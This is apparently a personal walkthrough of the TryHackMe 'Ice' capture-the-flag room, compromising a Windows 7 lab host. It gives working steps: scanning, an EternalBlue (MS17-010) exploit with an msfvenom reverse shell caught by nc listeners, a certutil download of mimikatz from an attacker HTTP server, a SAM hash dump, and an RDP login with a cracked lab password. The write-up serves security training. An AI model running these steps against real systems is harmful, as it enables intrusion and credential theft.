Ice (THM)

!!!!!!!redo with buffer overflow exploit

TryHackMeIce Write-Up

topics: Vulnerability scanning, Public exploits, Windows Privilege Escalation, Post-Exploitation, Cracking hashes

  1. Plan

  2. Enumeration

  3. System Privilege Escalation (Exploitation)

  4. Locating Admin Credentials

new tools: mimikatz, certutil

tools: nmapAutomator, dirsearch, python, nc, RDP, hashes.com, gobuster

Plan

This room is a walkthrough and uses metasploit. I will not be following the walkthrough nor using metasploit.

Enumeration

Initial nmap scan ./nmapAutomator.sh $ip Basic

Many potential attack vectors here. We have port 135 msrpc (Microsoft remote procedure call) open used for when a host wants to connect to a RPC service, port 139 and 445 are open running SMB, used for file sharing. We also have two ports running http lets dirsearch and gobuster those first before inspecting other attack vectors.

python3 dirsearch.py -u $ip -e php,html,txt

Navigating to /status.xsl confirms the platform the website is using is Icecast

gobuster dir -u http://10.10.154.230/secret -w /usr/share/dirb/wordlists/common.txt

There are many visible and hidden subdirectories on these two ports, however there is nothing of value upon initial inspection other than the website on port 8000 is running the Icecast service. Lets enumerate port 135, 139 and 445 next.

We can run a Samba scan using nmap: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

The IPC$ share allows Anonymous login and read access, we can attempt to view sensitive files by loggining in: smbclient //<ip>/IPC$

Unfortunately, because root owns this share this is the only thing we can do. Attempting to ls files or any other useful command results in error. The same applies to using smbget -R smb://<ip>/IPC$

It appears that we will not be able to gain access through information found on either Samba port. Lets use the only information we have, Icecast, to search for vulnerabilities and exploits

nmap --script vuln $ip or ./nmapAutomator.sh $ip Vulns

Because this system is Windows 7 and it uses SMBv1, it is vulnerable to EternalBlue, MS17-010.

searchsploit Icecast

There are several exploits we can use to gain initial access, but first we must discover which version of Icecast we are dealing with.

There is nothing in the source code of the main page that indicates a version. Nor is there any version on the /status.xsl subdirectory. Process of elimination seems to be the only method for exploiting this box. We should automatically rule out versions 1.x and attempt to use 2.x or 2.0.1. I will attempt to use exploit 568 as I cannot determine another method of discovering the version.

In an attempt to compile with x86_64-w64-mingw32-gcc ice.c -shared -o ice or with gcc -Wall ice.c -o ice there are many compiling errors, both on Kali 2020 and Kali 2018. Per the exploit notes, we would simply compile, run the program with $ip as an argument and listen with nc on port 9999. Reading through the program, there is nothing that we need to change so I'm unsure what the problem is. In order to manually exploit this, we would have to convert the metasploit module to python. This has been done per another writeup I found, but we can just try using EternalBlue instead.

System Privilege Escalation

This did not work on Kali 2020 so I used Kali 2018 for this. I'm assuming the python scripts are written for 2.7. Download the git repo and run

python eternalblue_checker.py <ip>

cd shellcode && ./shell_prep.sh

would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
LHOST : <attacker ip>
LPORT x64 : 8888
LPORT x86 : 9999
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
Type 0 to generate a staged payload or 1 to generate a stageless payload : 1

Listen with nc on both ports and run the exploit

nc -l -p 8888 -s <attackerLocalIP>
nc -l -p 9999 -s <attackerLocalIP>
python eternalblue_exploit7.py <ip> shellcode/sc_all.bin

We know RDP is open on this machine, lets try and find some admin credentials.

Locating Admin Credentials

We can use mimikatz to find credentials in memory. Mimikatz is a post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets

Start a python server and transfer mimikatz (locate mimikatz | grep exe) to the victim with certutil

python -m SimpleHTTPServer 80
certutil.exe -urlcache -f http://10.10.187.220/mimikatz.exe mimikatz.exe

mimikatz.exe

lsadump::sam Reference page

We can crack Dark's password with hashes.com

RDP into the machine using Remmina with the creds Dark:Password01!

Last updated